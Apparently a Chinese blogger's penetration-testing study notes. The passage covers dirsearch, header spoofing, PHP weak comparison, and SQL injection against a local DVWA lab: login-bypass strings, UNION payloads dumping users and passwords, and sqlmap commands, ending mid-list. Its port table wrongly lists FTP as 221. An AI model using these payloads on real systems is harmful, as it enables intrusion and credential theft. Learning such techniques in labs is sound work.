<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 5.4.2">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.2.0/css/all.min.css" integrity="sha256-AbA177XfpSnFEvgpYu1jMygiLabzPCJCRIBtR5jGc0k=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"example.com","root":"/","images":"/images","scheme":"Pisces","darkmode":false,"version":"8.13.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12},"copycode":{"enable":false,"style":null},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"},"path":"/search.xml","localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false}}</script><script src="/js/config.js"></script>

    <meta name="description" content="一、学习内容1.1dirsearch下载及使用 GitHub的下载地址为：https:&#x2F;&#x2F;github.com&#x2F;maurosoria&#x2F;dirsearch">
<meta property="og:type" content="article">
<meta property="og:title" content="网安篇（5）">
<meta property="og:url" content="http://example.com/2022/10/30/%E7%BD%91%E5%AE%89%E7%AF%87%EF%BC%885%EF%BC%89/index.html">
<meta property="og:site_name" content="無与倫比">
<meta property="og:description" content="一、学习内容1.1dirsearch下载及使用 GitHub的下载地址为：https:&#x2F;&#x2F;github.com&#x2F;maurosoria&#x2F;dirsearch">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://g.yuque.com/gr/latex?a%EF%BC%8C%E8%BE%93%E5%87%BA">
<meta property="og:image" content="https://g.yuque.com/gr/latex?b%E6%98%AF%E6%95%B0%E5%AD%97%E6%88%96%E8%80%85%E5%AD%97%E7%AC%A6%E4%B8%B2%E9%82%A3%E4%B9%88%E9%80%80%E5%87%BA%E5%BD%93%E5%89%8D%E8%84%9A%E6%9C%AC%0A(5)%E5%A6%82%E6%9E%9C">
<meta property="article:published_time" content="2022-10-30T04:22:05.796Z">
<meta property="article:modified_time" content="2022-10-31T12:29:51.055Z">
<meta property="article:author" content="alun">
<meta property="article:tag" content="——web">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://g.yuque.com/gr/latex?a%EF%BC%8C%E8%BE%93%E5%87%BA">


<link rel="canonical" href="http://example.com/2022/10/30/%E7%BD%91%E5%AE%89%E7%AF%87%EF%BC%885%EF%BC%89/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"http://example.com/2022/10/30/%E7%BD%91%E5%AE%89%E7%AF%87%EF%BC%885%EF%BC%89/","path":"2022/10/30/网安篇（5）/","title":"网安篇（5）"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>网安篇（5） | 無与倫比</title>
  





<link rel="stylesheet" href="https://lib.baomitu.com/social-share.js/1.0.16/css/share.min.css">
  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">無与倫比</p>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">菜鸟成长记</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a></li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup"><div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off" maxlength="80"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close" role="button">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div class="search-result-container no-result">
  <div class="search-result-icon">
    <i class="fa fa-spinner fa-pulse fa-5x"></i>
  </div>
</div>

    </div>
  </div>

</div>
        
  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>

  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E4%B8%80%E3%80%81%E5%AD%A6%E4%B9%A0%E5%86%85%E5%AE%B9"><span class="nav-number">1.</span> <span class="nav-text">一、学习内容</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#1-1dirsearch%E4%B8%8B%E8%BD%BD%E5%8F%8A%E4%BD%BF%E7%94%A8"><span class="nav-number">1.1.</span> <span class="nav-text">1.1dirsearch下载及使用</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-1-1%E5%91%BD%E4%BB%A4"><span class="nav-number">1.1.1.</span> <span class="nav-text">1.1.1命令</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#1-2%E4%BF%AE%E6%94%B9%E8%AF%B7%E6%B1%82%E5%A4%B4%E4%B8%BA%E6%9C%AC%E5%9C%B0%E8%AE%BF%E9%97%AE"><span class="nav-number">1.2.</span> <span class="nav-text">1.2修改请求头为本地访问</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#1-3xss%E6%BC%8F%E6%B4%9E"><span class="nav-number">1.3.</span> <span class="nav-text">1.3xss漏洞</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#1-4%E7%AB%AF%E5%8F%A3%E5%8F%B7%E5%AF%B9%E5%BA%94%E6%9C%8D%E5%8A%A1"><span class="nav-number">1.4.</span> <span class="nav-text">1.4端口号对应服务</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2-1%E6%8E%8C%E6%8F%A1php%E5%BC%B1%E7%B1%BB%E5%9E%8B%E6%AF%94%E8%BE%83"><span class="nav-number">1.5.</span> <span class="nav-text">2.1掌握php弱类型比较</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#2-1-1php%E4%B8%AD%E5%85%B6%E4%B8%AD%E4%B8%A4%E7%A7%8D%E6%AF%94%E8%BE%83%E7%AC%A6%E5%8F%B7"><span class="nav-number">1.5.1.</span> <span class="nav-text">2.1.1php中其中两种比较符号:</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#3-1sql%E6%89%8B%E5%B7%A5%E6%B3%A8%E5%85%A5"><span class="nav-number">1.6.</span> <span class="nav-text">3.1sql手工注入</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#3-1-1%E4%B8%87%E8%83%BD%E5%AF%86%E7%A0%81"><span class="nav-number">1.6.1.</span> <span class="nav-text">3.1.1万能密码</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-1-2mysql%E5%B8%B8%E8%A7%81%E5%90%8D%E7%A7%B0"><span class="nav-number">1.6.2.</span> <span class="nav-text">3.1.2mysql常见名称</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-1-3%E6%89%8B%E5%B7%A5%E6%B3%A8%E5%85%A5%E5%91%BD%E4%BB%A4"><span class="nav-number">1.6.3.</span> <span class="nav-text">3.1.3手工注入命令</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-1-4%E6%9C%89%E5%9B%9E%E6%98%BE%E7%9A%84%E6%89%8B%E5%B7%A5SQL%E6%B3%A8%E5%85%A5%E6%AD%A5%E9%AA%A4"><span class="nav-number">1.6.4.</span> <span class="nav-text">3.1.4有回显的手工SQL注入步骤</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#3-2sqlmap%E6%B3%A8%E5%85%A5"><span class="nav-number">1.7.</span> <span class="nav-text">3.2sqlmap注入</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#3-3SQL%E6%B3%A8%E5%85%A5%E9%98%B2%E5%BE%A1"><span class="nav-number">1.8.</span> <span class="nav-text">3.3SQL注入防御</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#4-1php%E6%AD%A3%E5%88%99%E5%8C%B9%E9%85%8D"><span class="nav-number">1.9.</span> <span class="nav-text">4.1php正则匹配</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#4-1-1php%E6%AD%A3%E5%88%99%E8%A1%A8%E8%BE%BE%E5%BC%8F-w-w-w-%E7%9A%84%E5%8C%BA%E5%88%AB%EF%BC%9F"><span class="nav-number">1.9.1.</span> <span class="nav-text">4.1.1php正则表达式[\w]+,\w+,[\w+]的区别？</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#4-1-2%E4%BE%8B"><span class="nav-number">1.9.2.</span> <span class="nav-text">4.1.2例</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#4-1-3%E6%AD%A3%E5%88%99%E8%A1%A8%E8%BE%BE%E5%BC%8F%E2%80%9C-d-d-d-%E2%80%9D%E6%98%AF%E4%BB%80%E4%B9%88%E6%84%8F%E6%80%9D%EF%BC%9F"><span class="nav-number">1.9.3.</span> <span class="nav-text">4.1.3正则表达式“\d+||(\d+\.\d+”是什么意思？</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#4-23-binwalk%E4%BD%BF%E7%94%A8"><span class="nav-number">1.10.</span> <span class="nav-text">4.23.binwalk使用</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#5-1php%E5%AE%9A%E7%95%8C%E7%AC%A6"><span class="nav-number">1.11.</span> <span class="nav-text">5.1php定界符</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#5-2%E6%AD%A3%E5%88%99%E8%A1%A8%E8%BE%BE%E5%BC%8F-%E4%BA%8C%EF%BC%89"><span class="nav-number">1.12.</span> <span class="nav-text">5.2正则表达式(二）</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#5-3%E5%AD%97%E7%AC%A6%E4%B8%B2%E7%BB%8F%E8%BF%87md5%E5%8A%A0%E5%AF%86"><span class="nav-number">1.13.</span> <span class="nav-text">5.3字符串经过md5加密</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#5-4%E5%90%84%E7%B1%BB%E6%96%87%E4%BB%B6%E7%9A%8416%E8%BF%9B%E5%88%B6%E5%BC%80%E5%A4%B4%E7%BB%93%E5%B0%BE"><span class="nav-number">1.14.</span> <span class="nav-text">5.4各类文件的16进制开头结尾</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#5-5%E5%B1%80%E5%9F%9F%E7%BD%91%E4%B8%BB%E6%9C%BA%E5%8F%91%E7%8E%B0"><span class="nav-number">1.15.</span> <span class="nav-text">5.5局域网主机发现</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#6-1vim-%E4%BA%A4%E6%8D%A2%E6%96%87%E4%BB%B6%E5%90%8D"><span class="nav-number">1.16.</span> <span class="nav-text">6.1vim 交换文件名</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E4%BA%8C%E3%80%81%E5%AD%A6%E4%B9%A0%E6%80%BB%E7%BB%93"><span class="nav-number">2.</span> <span class="nav-text">二、学习总结</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E4%B8%89%E3%80%81%E6%84%9F%E6%82%9F"><span class="nav-number">3.</span> <span class="nav-text">三、感悟</span></a></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author site-overview-item animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="alun"
      src="/images/alun.jpg">
  <p class="site-author-name" itemprop="name">alun</p>
  <div class="site-description" itemprop="description">静者心多妙，飘然思不群</div>
</div>
<div class="site-state-wrap site-overview-item animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">5</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">1</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">1</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>



        </div>
      </div>
    </div>
  </aside>
  <div class="sidebar-dimmer"></div>


    </header>

    
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2022/10/30/%E7%BD%91%E5%AE%89%E7%AF%87%EF%BC%885%EF%BC%89/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/alun.jpg">
      <meta itemprop="name" content="alun">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="無与倫比">
      <meta itemprop="description" content="静者心多妙，飘然思不群">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="网安篇（5） | 無与倫比">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          网安篇（5）
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2022-10-30 12:22:05" itemprop="dateCreated datePublished" datetime="2022-10-30T12:22:05+08:00">2022-10-30</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">更新于</span>
      <time title="修改时间：2022-10-31 20:29:51" itemprop="dateModified" datetime="2022-10-31T20:29:51+08:00">2022-10-31</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/%E2%80%94%E2%80%94%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/" itemprop="url" rel="index"><span itemprop="name">——网络安全</span></a>
        </span>
    </span>

  
    <span class="post-meta-break"></span>
    <span class="post-meta-item" title="本文字数">
      <span class="post-meta-item-icon">
        <i class="far fa-file-word"></i>
      </span>
      <span class="post-meta-item-text">本文字数：</span>
      <span>8.4k</span>
    </span>
    <span class="post-meta-item" title="阅读时长">
      <span class="post-meta-item-icon">
        <i class="far fa-clock"></i>
      </span>
      <span class="post-meta-item-text">阅读时长 &asymp;</span>
      <span>14 分钟</span>
    </span>
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
        <h1 id="一、学习内容"><a href="#一、学习内容" class="headerlink" title="一、学习内容"></a>一、学习内容</h1><h2 id="1-1dirsearch下载及使用"><a href="#1-1dirsearch下载及使用" class="headerlink" title="1.1dirsearch下载及使用"></a>1.1dirsearch下载及使用</h2><pre><code> GitHub的下载地址为：https://github.com/maurosoria/dirsearch
</code></pre>
<span id="more"></span>

<h3 id="1-1-1命令"><a href="#1-1-1命令" class="headerlink" title="1.1.1命令"></a>1.1.1命令</h3><p>使用python.exe dirsearch.py -h可以查看到各种命令。</p>
<p>常用：dirsearch.py -u ip地址 -e </p>
<p>​        -u 指定url</p>
<p>-e 指定网站语言</p>
<p>-w 可以加上自己的字典（带上路径）</p>
<p>例如：</p>
<h2 id="1-2修改请求头为本地访问"><a href="#1-2修改请求头为本地访问" class="headerlink" title="1.2修改请求头为本地访问"></a>1.2修改请求头为本地访问</h2><p>X-Forward-For：127.0.0.1</p>
<p>Referer：127.0.0.1</p>
<h2 id="1-3xss漏洞"><a href="#1-3xss漏洞" class="headerlink" title="1.3xss漏洞"></a>1.3xss漏洞</h2><p>在登录界面随便输入一个账号密码，看一下返回的信息若得到错误的信息，发现url里面有get类型的错误参数，如果没有过滤的话我们将文字替换为可以得到xss漏洞，没有过滤，拿下xss。</p>
<h2 id="1-4端口号对应服务"><a href="#1-4端口号对应服务" class="headerlink" title="1.4端口号对应服务"></a>1.4端口号对应服务</h2><p>HTTP                                             80</p>
<p>​        HTTPS                                            443</p>
<p>​        Telnet                                             23</p>
<p>​        FTP                                             221</p>
<p>​        SSH（远程登录）SCP（文件传输），端口重定向     22</p>
<p>​        SMTP                                            25</p>
<p>​         POP3                                            110</p>
<p>​        WebLogic                                        7001</p>
<p>​        TOMCAT                                        8080</p>
<p>​        WIN2003远程登录                                3389</p>
<p>​        Oracle数据库                                    1521</p>
<p>​        MS SQL*SEVER数据库sever                        1433</p>
<p>​        MySQL数据库sever                                3306</p>
<h2 id="2-1掌握php弱类型比较"><a href="#2-1掌握php弱类型比较" class="headerlink" title="2.1掌握php弱类型比较"></a>2.1掌握php弱类型比较</h2><h3 id="2-1-1php中其中两种比较符号"><a href="#2-1-1php中其中两种比较符号" class="headerlink" title="2.1.1php中其中两种比较符号:"></a>2.1.1php中其中两种比较符号:</h3><p>==：先将字符串类型转化成相同，再比较<br>===：先判断两种字符串的类型是否相等，再比较字符串和数字比较使用==时,字符串会先转换为数字类型再比较<br>var_dump(‘a’ == 0);//true，此时a字符串类型转化成数字，因为a字符串开头中没有找到数字，所以转换为0。<br>var_dump(‘123a’ == 123);//true，这里’123a’会被转换为123。</p>
<p>var_dump(‘a123’ == 123);//false，因为php中有这样一个规定：字符串的开始部分决定了它的值，如果该字符串以合法的数字开始，则使用该数字至和它连续的最后一个数字结束，否则其比较时整体值为0。<br>举例：<br>var_dump(‘123a1’ == 123);//true<br>var_dump(‘1233a’ == 123);//false<br>&lt;、&gt;、&lt;=、&gt;=都存在和==相同的弱类型</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">show_source(__FILE__);</span><br><span class="line">include(&quot;config.php&quot;);</span><br><span class="line">$a=@$_GET[&#x27;a&#x27;];</span><br><span class="line">$b=@$_GET[&#x27;b&#x27;];</span><br><span class="line">if($a==0 and $a)&#123;</span><br><span class="line">    echo $flag1;</span><br><span class="line">&#125;</span><br><span class="line">if(is_numeric($b))&#123;</span><br><span class="line">    exit();</span><br><span class="line">&#125;</span><br><span class="line">if($b&gt;1234)&#123;</span><br><span class="line">    echo $flag2;</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>



<p>(1)这里包含了config.php<br>(2)url接收参数a和b的值<br>(3)如果$a等于0 and <img src="https://g.yuque.com/gr/latex?a%EF%BC%8C%E8%BE%93%E5%87%BA" alt="img">flag1<br>(4)如果<img src="https://g.yuque.com/gr/latex?b%E6%98%AF%E6%95%B0%E5%AD%97%E6%88%96%E8%80%85%E5%AD%97%E7%AC%A6%E4%B8%B2%E9%82%A3%E4%B9%88%E9%80%80%E5%87%BA%E5%BD%93%E5%89%8D%E8%84%9A%E6%9C%AC%0A(5)%E5%A6%82%E6%9E%9C" alt="img">b&gt;1234，输出$flag2</p>
<p>if(true and true){ //这里$a==0 and $a，==为弱类型比较，字符串开头都为0，所以0==0 and ‘b’，因为字符串b存在，所以and后面也为true，所以双true，最后if括号里为true，执行if下面的语句</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">echo $flag1;</span><br><span class="line">&#125;</span><br><span class="line">if(is_numeric(2222a))&#123;</span><br><span class="line">exit();</span><br><span class="line">&#125;</span><br><span class="line">if(2222a&gt;1234)&#123;</span><br><span class="line">echo $flag2;</span><br></pre></td></tr></table></figure>

<h2 id="3-1sql手工注入"><a href="#3-1sql手工注入" class="headerlink" title="3.1sql手工注入"></a>3.1sql手工注入</h2><h3 id="3-1-1万能密码"><a href="#3-1-1万能密码" class="headerlink" title="3.1.1万能密码"></a>3.1.1万能密码</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">admin&#x27; --</span><br><span class="line">admin&#x27; #</span><br><span class="line">admin&#x27;/*</span><br><span class="line">&#x27; or 1=1--</span><br><span class="line">&#x27; or 1=1#</span><br><span class="line">&#x27; or 1=1/*</span><br><span class="line">&#x27;) or &#x27;1&#x27;=&#x27;1--</span><br><span class="line">&#x27;) or (&#x27;1&#x27;=&#x27;1--</span><br></pre></td></tr></table></figure>

<h3 id="3-1-2mysql常见名称"><a href="#3-1-2mysql常见名称" class="headerlink" title="3.1.2mysql常见名称"></a>3.1.2mysql常见名称</h3><p>schema_name　　储存了所有数据库的库名<br>tables　　        储存了数据库库名，以及该库中包含的表名<br>table_schema　   储存了数据库名<br>table_name　　   储存了表名</p>
<h3 id="3-1-3手工注入命令"><a href="#3-1-3手工注入命令" class="headerlink" title="3.1.3手工注入命令"></a>3.1.3手工注入命令</h3><p>爆表<br>1’ union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#<br>爆列<br>1’ union select 1,group_concat(column_name) from information_schema.columns where table_name=’users’ and table_schema=’dvwa’#</p>
<h3 id="3-1-4有回显的手工SQL注入步骤"><a href="#3-1-4有回显的手工SQL注入步骤" class="headerlink" title="3.1.4有回显的手工SQL注入步骤"></a>3.1.4有回显的手工SQL注入步骤</h3><p>mysql的注释可以是#或者– ，注意–后面有空格，可以写成– ss这样比较不容易漏掉空格。此外如果在url中用#要进行url编码，写为%23。</p>
<p>1、找注入点</p>
<p>2、找闭合，常见的有单引号、双引号（字符型），无闭合（数值型）</p>
<p>确定</p>
<p>3、确定列数 order by</p>
<p>4、确定字段类型 union select</p>
<p>5、爆库  union select 1,database()</p>
<p>爆表</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()</span><br><span class="line">union select 1,group_concat(table_name) from information_schema.tables where table_schema=&#x27;dvwa&#x27;</span><br><span class="line">union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x64767761   （0x64767761是dvwa的ascii码）</span><br></pre></td></tr></table></figure>



<p>爆列</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">union select 1,group_concat(column_name) from information_schema.columns where table_name=&#x27;users&#x27; and table_schema=&#x27;dvwa&#x27;</span><br><span class="line">union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 and table_schema=0x64767761</span><br></pre></td></tr></table></figure>

<p>爆内容</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">union select group_concat(user),group_concat(password) from users</span><br></pre></td></tr></table></figure>

<h2 id="3-2sqlmap注入"><a href="#3-2sqlmap注入" class="headerlink" title="3.2sqlmap注入"></a>3.2sqlmap注入</h2><p>1、如果是post型，可以先burpsuite抓包保存为txt</p>
<p>2、找注入点（可以省略）</p>
<p>python sqlmap.py -u “<a target="_blank" rel="noopener" href="http://192.168.116.132/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit#&quot;">http://192.168.116.132/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit#&quot;</a> –cookie “security=low; PHPSESSID=6r4n8jpd2m6mm5nesv83m924n4”     （GET型，如果需要认证身份要加cookie）</p>
<p>python2 sqlmap.py -r “E:\渗透测试学习资料\dvwa\sqli\medium.txt”           （POST型）</p>
<p>python2 sqlmap.py -r “E:\渗透测试学习资料\dvwa\sqli\high.txt” –second-url “<a target="_blank" rel="noopener" href="http://192.168.116.132/dvwa/vulnerabilities/sqli/&quot;">http://192.168.116.132/dvwa/vulnerabilities/sqli/&quot;</a>          （POST型，输入和回显不在同一个页面)</p>
<p>3、爆库</p>
<p>python sqlmap.py -u “<a target="_blank" rel="noopener" href="http://192.168.116.132/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit#&quot;">http://192.168.116.132/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit#&quot;</a> –cookie “security=low; PHPSESSID=6r4n8jpd2m6mm5nesv83m924n4” -dbs           （GET型，全部可访问的数据库）</p>
<p>python sqlmap.py -u “<a target="_blank" rel="noopener" href="http://192.168.116.132/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit#&quot;">http://192.168.116.132/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit#&quot;</a> –cookie “security=low; PHPSESSID=6r4n8jpd2m6mm5nesv83m924n4” –current-db         （GET型，当前数据库）</p>
<p>python2 sqlmap.py -r “E:\渗透测试学习资料\dvwa\sqli\medium.txt” –current-db              （POST型，当前数据库）</p>
<p>python2 sqlmap.py -r “E:\渗透测试学习资料\dvwa\sqli\high.txt” –second-url “<a target="_blank" rel="noopener" href="http://192.168.116.132/dvwa/vulnerabilities/sqli/&quot;">http://192.168.116.132/dvwa/vulnerabilities/sqli/&quot;</a> –current-db     （POST型，输入和回显不在同一个页面，当前数据库）</p>
<p>4、爆表</p>
<p>python sqlmap.py -u “<a target="_blank" rel="noopener" href="http://192.168.116.132/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit#&quot;">http://192.168.116.132/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit#&quot;</a> –cookie “security=low; PHPSESSID=6r4n8jpd2m6mm5nesv83m924n4” –tables -D dvwa    （GET型）</p>
<p>python2 sqlmap.py -r “E:\渗透测试学习资料\dvwa\sqli\medium.txt” –tables -D dvwa       （POST型）</p>
<p>python2 sqlmap.py -r “E:\渗透测试学习资料\dvwa\sqli\high.txt” –second-url “<a target="_blank" rel="noopener" href="http://192.168.116.132/dvwa/vulnerabilities/sqli/&quot;">http://192.168.116.132/dvwa/vulnerabilities/sqli/&quot;</a> –tables -D dvwa         （POST型，输入和回显不在同一个页面)</p>
<p>5、爆列</p>
<p>python sqlmap.py -u “<a target="_blank" rel="noopener" href="http://192.168.116.132/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit#&quot;">http://192.168.116.132/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit#&quot;</a> –cookie “security=low; PHPSESSID=6r4n8jpd2m6mm5nesv83m924n4” –columns -D dvwa -T users    （GET型）</p>
<p>python2 sqlmap.py -r “E:\渗透测试学习资料\dvwa\sqli\medium.txt” –columns -D dvwa -T users     （POST型）</p>
